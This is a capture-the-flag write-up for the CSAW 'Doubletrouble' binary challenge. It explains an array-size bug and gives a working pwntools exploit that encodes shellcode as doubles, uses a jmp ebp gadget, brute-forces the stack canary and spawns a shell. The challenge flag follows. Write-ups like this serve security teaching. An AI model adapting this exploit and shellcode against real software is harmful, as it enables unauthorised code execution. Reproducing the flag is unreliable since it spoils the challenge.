Writeup Test

# Doubletrouble Description: Did you know every Number in javascript is a float host: pwn.chal.csaw.io port: 9002 creator: nsnc ## Bug The `findArray()` function finds the first number between -100 and -10. It modifies the array size, and will increase it by the distance from the beginning of the array that the first element between -100 and -10 is found. ## Exploitation 1. Increase size of array 2. Place `jump ebp` gadget in the array ```python jmpebp = '080497b800000000' # 4.86192279173924203790903928618E-270 ``` 2. Place address of beginning of the array on the stack so that it will be popped into ebp when it is sorted. ```python stack_address = p.readline()[2:10] shellcode_location = '080497b8' + stack_address # that first part is pading to be sorted in the right spot ``` 3. Write some shellcode so that it will be sorted at the very beginning of the array. ```python shellcode1 = 'fcfc56f631580b6a' shellcode2 = 'f9f9f968732f2f68' shellcode3 = 'f8e3896e69622f68' shellcode4 = 'f7fa80cdca89c931' shellcodesortedbelowthis = 'f7f94e24f7f94e24' ``` 4. Run the exploit multiple times to bruteforce the stack canary ```python #!/usr/bin/env python2 from pwn import * import binascii import codecs import sys ''' NOTE: Must be ran multiple times to brute force stack canary. ''' def hextodouble(hexstring): return str('%.16E' % struct.unpack('!d',codecs.decode(hexstring, 'hex'))[0]) #context.log_level = 'debug' context.terminal = ['tmux', 'splitw', '-h'] while True: try: p = process("./doubletrouble") #p = remote('pwn.chal.csaw.io', 9002) stack_address = p.readline()[2:10] #shellcode shellcode1 = 'fcfc56f631580b6a' shellcode2 = 'f9f9f968732f2f68' shellcode3 = 'f8e3896e69622f68' shellcode4 = 'f7fa80cdca89c931' shellcodesortedbelowthis = 'f7f94e24f7f94e24' p.sendline("64") for i in range(4): p.sendline(hextodouble(shellcodesortedbelowthis)) p.sendline("-11") for i in range(57 - 4): # subtract 4 for shellcode p.sendline(hextodouble(shellcodesortedbelowthis)) p.sendline(hextodouble(shellcode1)) p.sendline(hextodouble(shellcode2)) p.sendline(hextodouble(shellcode3)) p.sendline(hextodouble(shellcode4)) jmpebp = '080497b800000000' # 4.86192279173924203790903928618E-270 shellcode_location = '080497b8' + stack_address # that first part is pading to be sorted in the right spot print("shellcode_location: ") print(shellcode_location) print(hextodouble(shellcode_location)) p.sendline(hextodouble(shellcode_location)) p.sendline(hextodouble(jmpebp)) p.interactive() p.close() raw_input() except KeyboardInterrupt: p.close() sys.exit() except EOFError: p.close() ``` ## Flag ``` flag{4_d0ub1e_d0ub1e_3ntr3ndr3} ```

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